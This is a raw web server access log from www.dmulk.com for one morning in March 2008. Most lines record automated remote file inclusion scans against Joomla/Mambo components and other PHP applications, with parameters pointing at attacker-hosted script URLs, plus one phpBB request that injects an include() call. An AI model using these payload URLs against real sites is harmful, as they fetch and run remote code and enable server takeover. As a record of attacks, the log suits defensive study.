74.6.21.91 - - [27/Mar/2008:05:54:37 -0700] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.102.153 - - [27/Mar/2008:05:54:49 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.118.102.153 - - [27/Mar/2008:05:54:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.31.206.140 - - [27/Mar/2008:05:56:29 -0700] "GET /logs/index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.geocities.com/vie.tian/31377.txt%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.53 - - [27/Mar/2008:05:57:18 -0700] "GET /?M=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.73.237 - - [27/Mar/2008:06:00:39 -0700] "GET /index.php?x=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.214.73.237 - - [27/Mar/2008:06:00:39 -0700] "GET /logs/index.php?x=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:06:01:40 -0700] "GET /logs/access_080312.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:06:01:41 -0700] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:01:46 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:01:48 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:01:49 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:01:49 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:02:13 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:02:14 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.16.78.174 - - [27/Mar/2008:06:02:41 -0700] "GET /logs/access.log/components/com_galleria/class.galleria.php?mosConfig_absolute_path=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:02:59 -0700] "GET /logs/access_080312.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:04:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:06:04:42 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:05:23 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:05:23 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:05:23 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:05:56 -0700] "GET /logs/access_080131.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.16.78.174 - - [27/Mar/2008:06:09:45 -0700] "GET /logs/access_080312.log/components/com_galleria/class.galleria.php?mosConfig_absolute_path=http://www.motoxclub.org.au/forum/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.254.233 - - [27/Mar/2008:06:09:51 -0700] "GET /logs/access_080218.log/modifyform.html?code=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:10:00 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:10:00 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.69.118 - - [27/Mar/2008:06:10:01 -0700] "GET /logs/access_080225.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.69.118 - - [27/Mar/2008:06:10:08 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:10:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:06:11:20 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:11:44 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:11:44 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [27/Mar/2008:06:12:27 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:12:40 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:13:17 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:13:18 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:13:18 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:13:53 -0700] "GET /logs/access_080119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:13:53 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:13:53 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:14:40 -0700] "GET /logs/access_080218.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:15:34 -0700] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:15:41 -0700] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:15:48 -0700] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:15:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:15:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:15:54 -0700] "GET /logs/access_080119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:15:54 -0700] "GET /logs/access.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:15:55 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:15:55 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:16:08 -0700] "GET /logs/access.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:16:41 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:16:53 -0700] "GET /logs/access_080218.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:17:19 -0700] "GET /logs/access_080312.log//?pg=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:17:19 -0700] "GET //?pg=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:17:20 -0700] "GET /logs//?pg=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 200 40554 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:06:17:41 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:19:33 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:19:34 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:19:51 -0700] "GET /logs/access_080223.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:19:51 -0700] "GET //index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:19:51 -0700] "GET /logs//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:06:19:54 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:20:11 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:20:11 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:06:20:12 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:06:20:14 -0700] "GET /logs/access_080313.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:20:56 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:20:57 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:20:57 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:20:58 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:21:49 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:21:49 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:21:50 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:21:51 -0700] "GET /logs/access_080223.log//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:22:03 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.69.118 - - [27/Mar/2008:06:22:04 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:22:19 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:22:19 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:22:20 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:22:36 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:22:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:22:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:22:54 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:22:56 -0700] "GET /logs/access_080223.log//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:22:59 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.104.83.81 - - [27/Mar/2008:06:23:02 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://web87.go2game.de/vwar/images/member/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:06:23:30 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:06:23:30 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:23:50 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:23:50 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:23:51 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:06:23:55 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:24:07 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:24:07 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:24:08 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:24:45 -0700] "GET /logs/access_080312.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [27/Mar/2008:06:25:02 -0700] "GET /logs/access_080312.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:06:25:57 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:06:26:15 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:06:26:17 -0700] "GET /logs/access_071122.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.111 - - [27/Mar/2008:06:26:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.77 - - [27/Mar/2008:06:26:37 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.232.156.130 - - [27/Mar/2008:06:27:05 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.229.194 - - [27/Mar/2008:06:27:12 -0700] "GET /logs/access_080223.log//index.php?option=com_pccookbook&page=viewuserrecipes&user_id=http://www.geocities.com/boyo.kali/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
